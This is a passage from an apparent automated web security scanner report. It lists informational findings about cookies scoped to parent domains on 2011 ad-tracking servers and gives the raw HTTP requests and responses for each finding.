8.8. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:14:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:29 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:29 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=1608123674&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_
...[SNIP]...

8.9. http://cm.au.thewest.overture.com/js_flat_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.au.thewest.overture.com
Path:   /js_flat_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?config=6518910550&source=thewest_y7news_au_ctxt&type=thewest_y7news&ctxtId=thewest_y7news&mkt=au&maxCount=3&keywordCharEnc=UTF8&outputCharEnc=UTF8&ctxtUrl=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F HTTP/1.1
Host: cm.au.thewest.overture.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDEyNjEzNXc0cAN9RMwAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sat, 04-Sep-2021 14:15:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 554

zCn = "";
zRef = "";
zSr = new Array("Reach 80% of active Internet users with Yahoo!.",
"",
"",
"Sponsored Links",
"http://searchmarketing.yahoo.com/en_AU/",
"",
"Lifebroker.",
"",
"http://rc.asia.sr
...[SNIP]...

8.10. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V12F568CAD2J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q06E0F03A000059/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Thu, 06 Sep 2012 14:14:20 GMT;domain=.zedo.com;path=/;
ETag: "436874d-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=25882
Expires: Wed, 07 Sep 2011 21:25:42 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

8.11. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/130511/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/130511/0/vj?z=hpi&dim=63352&pos=1&pv=6402171833906324&nc=59081627&tz=300&url=http%3A%2F%2Fwww.perthnow.com.au%2F&refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dperth%2Bnews HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: ajess1_32177B6AC43D44C99988CDC0=a; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/
Set-Cookie: i=202013Ji03cHD3JhX00001N816qkP20GX142872422_84859000003JPq; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:14:18 GMT; Path=/servlet/ajrotator/track/pt63689
Set-Cookie: ajcmp=20236X0003BIY; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/
Content-Type: application/x-javascript
Content-Length: 378
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V128E2DB70EJ-573I706K6334213
...[SNIP]...

8.12. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/80617/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/80617/0/vj?z=hpi&dim=63352&pos=1&pv=6592370152939112&nc=20039895&tz=300&url=http%3A%2F%2Fwww.ntnews.com.au%2F&refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dperth%2Bnews HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: i=202013Ji03PQd3JhX00001N816qkP20FX132910139_5124900003Djv; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:17:27 GMT; Path=/servlet/ajrotator/track/pt63689
Content-Type: application/x-javascript
Content-Length: 377
Date: Wed, 07 Sep 2011 14:17:27 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121145851DJ-573I706K63342132
...[SNIP]...

8.13. http://i.w55c.net/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /a.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.gif?t=0&id=0RlCN4ZmQt0FXYalebQa&si=2995815&pcid=1027317&ei=RMX&ci=8998917&p=258&s=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D15%2Ehtml%3Fcb%3D0%2E33166992268525064&reqid=1315404893&cat=32 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:06 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:06 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.14. http://i.w55c.net/m.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /m.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m.gif?id=8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33&ei=ADBRITE&cver=1&euid=MTY4Mjk2NTQyeDAuMDk2IDEzMTQ4OTI0NTR4LTM2NTcxMDg5MQ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:33 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.15. http://i.w55c.net/m_yahoo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /m_yahoo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:44 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F82e0303e4a9098b0c77927fc;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:44 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.16. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; optout=1

Response

HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:14:15 GMT
Cache-Control: private
Content-Length: 0
X-Version: DataXu Pixel Tracker v3
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
Via: 1.1 bfi061004 (MII-APC/2.1)
Content-Type: text/plain


8.17. http://id.google.com/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=oTAg0OH1iUX1aGNgIW2wChfkIoSLJt8xuDMfOFyxVg=oGRBdwqM85CGy488; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=7DcJ8TkxZNuojatwkS_Hu7O0sJMqlxF_nzrxj0mfuw=5NnmLWq9agBvrwLy; expires=Thu, 08-Mar-2012 14:14:01 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:14:01 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

8.18. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:44 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.19. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=46812628&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^7&12590^7; rdk=7725/12338; rdk2=0; ses2=12338^12&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddc890c2ebd61ea165; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^77; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63579; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.20. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-15.js

Issue detail

